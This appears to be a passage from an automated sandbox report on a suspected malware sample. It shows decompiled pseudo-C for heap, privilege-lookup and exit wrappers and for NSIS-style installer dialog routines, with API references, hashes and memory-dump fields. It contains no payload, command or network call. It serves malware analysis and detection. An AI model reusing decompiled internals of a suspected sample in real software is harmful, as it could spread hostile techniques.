                                                                                                    Function 004484CF, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004484CF(void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				intOrPtr _v117;
				char _t12;
				void* _t18;

				_v117 = _v117 - __edx;
				_t9 = _a4;
				_t5 = _t9 + 0xc74; // 0xc74
				E00448DC0(_t18, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}






                                                                                                    0x004484cf
                                                                                                    0x004484d3
                                                                                                    0x004484df
                                                                                                    0x004484e7
                                                                                                    0x004484fd
                                                                                                    0x00448501

                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000060,00438AF3,?,?,00438AF3,00000060,00000000,00000000,?,?,00438AF3,?,00000000), ref: 004484FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3298025750-0
                                                                                                    • Opcode ID: 4ce80fcaabcf3a5050215dc6dadf3f1476e732839e4e5bef25e44dc588030626
                                                                                                    • Instruction ID: 3ca0e3ec54612b4dbc4f65b0caa733b575f8b787a024f10094e8ebc292715d3c
                                                                                                    • Opcode Fuzzy Hash: 4ce80fcaabcf3a5050215dc6dadf3f1476e732839e4e5bef25e44dc588030626
                                                                                                    • Instruction Fuzzy Hash: 99E01AB1600204AFDB18DF65CC45EEB77A8EF98350F118559F90997251C631E910CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004484D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004484D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00448DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                    0x004484df
                                                                                                    0x004484e7
                                                                                                    0x004484fd
                                                                                                    0x00448501

                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000060,00438AF3,?,?,00438AF3,00000060,00000000,00000000,?,?,00438AF3,?,00000000), ref: 004484FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3298025750-0
                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                    • Instruction ID: e3a4a701a9d416911259dc830afa0f9742f94d7a4fc40d439af412746645da8b
                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                    • Instruction Fuzzy Hash: C0E04FB12002046BD714EF59CC45EA777ACEF88750F014559FD0857241CA30F910CAF0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00448490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00448490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00448DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                    0x004484a7
                                                                                                    0x004484bd
                                                                                                    0x004484c1

                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00443516,?,00443C8F,00443C8F,?,00443516,?,?,?,?,?,00000000,00438AF3,?), ref: 004484BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                    • Instruction ID: 40521bec3b687fdd17ca28567c40252dfe5d6c791fb2c2b0a9867190f7f77375
                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                    • Instruction Fuzzy Hash: 82E046B1200208ABDB14EF99CC41EAB77ACEF88754F118559FE085B282CA30F910CBF0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00448630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00448630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00448DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                    0x0044864a
                                                                                                    0x00448660
                                                                                                    0x00448664

                                                                                                    APIs
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0043CFA2,0043CFA2,00000041,00000000,?,00438B65), ref: 00448660
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3899507212-0
                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                    • Instruction ID: 596124110b26a9e67216051d2c40f17328cdae12255605ec739b94a2341ce534
                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                    • Instruction Fuzzy Hash: 6FE01AB16002086BDB10EF49CC85EEB37ADAF88650F018559FA0857241C934E8108BF5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00448510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00448510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00448DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                    0x00448513
                                                                                                    0x0044852a
                                                                                                    0x00448538

                                                                                                    APIs
                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00448538
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 621844428-0
                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                    • Instruction ID: 3412d298a0cfcb3c917ad8fa40f69de34b9d8f195acc858bc26665f0598d2c2f
                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                    • Instruction Fuzzy Hash: A6D012716002147BD620EF99CC85FD7779CDF48750F018469BA1C5B241C931BA0086E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: be26511fb111c8801e37ef213ce8458de14d67d73ddaf9a1d17aeb768c07098d
                                                                                                    • Instruction ID: a3ef303c44f6f9dbe0f9b83ea24c2ef8662500b7eb8b28e738ee8df7cb61ecba
                                                                                                    • Opcode Fuzzy Hash: be26511fb111c8801e37ef213ce8458de14d67d73ddaf9a1d17aeb768c07098d
                                                                                                    • Instruction Fuzzy Hash: A8B092B29424C5CAEB11E7B04A0CB2B7A40BBE0741F27C066E2030695A4778C4A1F6BA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 95%
                                                                                                    			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                                    0x0040504b
                                                                                                    0x00405051
                                                                                                    0x0040505a
                                                                                                    0x0040505d
                                                                                                    0x004051f5
                                                                                                    0x00405219
                                                                                                    0x00405219
                                                                                                    0x0040522c
                                                                                                    0x0040524a
                                                                                                    0x00405251
                                                                                                    0x004052a8
                                                                                                    0x004052ac
                                                                                                    0x00000000
                                                                                                    0x004052b3
                                                                                                    0x004052bb
                                                                                                    0x004052c3
                                                                                                    0x004052c6
                                                                                                    0x004053bf
                                                                                                    0x00000000
                                                                                                    0x004053bf
                                                                                                    0x004052d5
                                                                                                    0x004052e1
                                                                                                    0x004052e7
                                                                                                    0x004052ed
                                                                                                    0x00405302
                                                                                                    0x00405308
                                                                                                    0x004052ef
                                                                                                    0x004052f4
                                                                                                    0x004052fa
                                                                                                    0x004052fd
                                                                                                    0x004052fd
                                                                                                    0x00405318
                                                                                                    0x00405320
                                                                                                    0x00405323
                                                                                                    0x0040532c
                                                                                                    0x0040532f
                                                                                                    0x00405336
                                                                                                    0x0040533d
                                                                                                    0x00405345
                                                                                                    0x00405345
                                                                                                    0x0040535c
                                                                                                    0x0040535c
                                                                                                    0x00405363
                                                                                                    0x00405369
                                                                                                    0x00405372
                                                                                                    0x00405379
                                                                                                    0x00405382
                                                                                                    0x00405384
                                                                                                    0x00405387
                                                                                                    0x00405396
                                                                                                    0x00405398
                                                                                                    0x0040539e
                                                                                                    0x0040539f
                                                                                                    0x004053a0
                                                                                                    0x004053a8
                                                                                                    0x004053b3
                                                                                                    0x004053b9
                                                                                                    0x004053b9
                                                                                                    0x00000000
                                                                                                    0x00405323
                                                                                                    0x004052ac
                                                                                                    0x00405259
                                                                                                    0x00405289
                                                                                                    0x00405291
                                                                                                    0x0040529c
                                                                                                    0x0040529c
                                                                                                    0x004052a3
                                                                                                    0x00000000
                                                                                                    0x004052a3
                                                                                                    0x0040525d
                                                                                                    0x00405267
                                                                                                    0x00000000
                                                                                                    0x0040522e
                                                                                                    0x00405234
                                                                                                    0x0040526c
                                                                                                    0x00000000
                                                                                                    0x00405275
                                                                                                    0x0040523d
                                                                                                    0x00405242
                                                                                                    0x00405245
                                                                                                    0x00000000
                                                                                                    0x00405245
                                                                                                    0x0040522c
                                                                                                    0x00405063
                                                                                                    0x00405067
                                                                                                    0x00405070
                                                                                                    0x00405077
                                                                                                    0x0040507a
                                                                                                    0x0040507d
                                                                                                    0x00405080
                                                                                                    0x00405081
                                                                                                    0x00405082
                                                                                                    0x0040509b
                                                                                                    0x0040509e
                                                                                                    0x004050a8
                                                                                                    0x004050b7
                                                                                                    0x004050bf
                                                                                                    0x004050c7
                                                                                                    0x004050cc
                                                                                                    0x004050cf
                                                                                                    0x004050db
                                                                                                    0x004050e4
                                                                                                    0x004050ed
                                                                                                    0x00405110
                                                                                                    0x00405116
                                                                                                    0x00405127
                                                                                                    0x0040512c
                                                                                                    0x0040513a
                                                                                                    0x00405148
                                                                                                    0x00405148
                                                                                                    0x0040514d
                                                                                                    0x0040515b
                                                                                                    0x0040515b
                                                                                                    0x00405160
                                                                                                    0x00405163
                                                                                                    0x00405168
                                                                                                    0x00405174
                                                                                                    0x0040517d
                                                                                                    0x0040518a
                                                                                                    0x00405199
                                                                                                    0x0040518c
                                                                                                    0x00405191
                                                                                                    0x00405191
                                                                                                    0x004051a5
                                                                                                    0x004051a5
                                                                                                    0x004051b9
                                                                                                    0x004051c2
                                                                                                    0x004051cb
                                                                                                    0x004051db
                                                                                                    0x004051e7
                                                                                                    0x004051e7
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32 ref: 004050A1
                                                                                                    • GetDlgItem.USER32 ref: 004050B0
                                                                                                    • GetClientRect.USER32 ref: 004050ED
                                                                                                    • GetSystemMetrics.USER32 ref: 004050F5
                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                                    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                                    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                                    • GetDlgItem.USER32 ref: 004051B2
                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                                    • GetDlgItem.USER32 ref: 004050BF
                                                                                                      • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                                    • GetDlgItem.USER32 ref: 00405204
                                                                                                    • CreateThread.KERNEL32 ref: 00405212
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                                    • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                                    • ShowWindow.USER32(00000008), ref: 00405289
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
                                                                                                    • CreatePopupMenu.USER32 ref: 004052CC
                                                                                                    • AppendMenuA.USER32 ref: 004052E1
                                                                                                    • GetWindowRect.USER32 ref: 004052F4
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                                    • GlobalLock.KERNEL32 ref: 0040537C
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
                                                                                                    • SetClipboardData.USER32 ref: 004053B3
                                                                                                    • CloseClipboard.USER32 ref: 004053B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                    • String ID: {
                                                                                                    • API String ID: 590372296-366298937
                                                                                                    • Opcode ID: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                    • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                                    • Opcode Fuzzy Hash: 5aa5e299d21103ac010b4f938d0fd54a6532c41be376ce1bb5dd201a3ba19c05
                                                                                                    • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404853, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 97%
                                                                                                    			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004047D3(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42047c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420494;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42047c = _t315;
								 *0x420494 = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420494;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420494);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
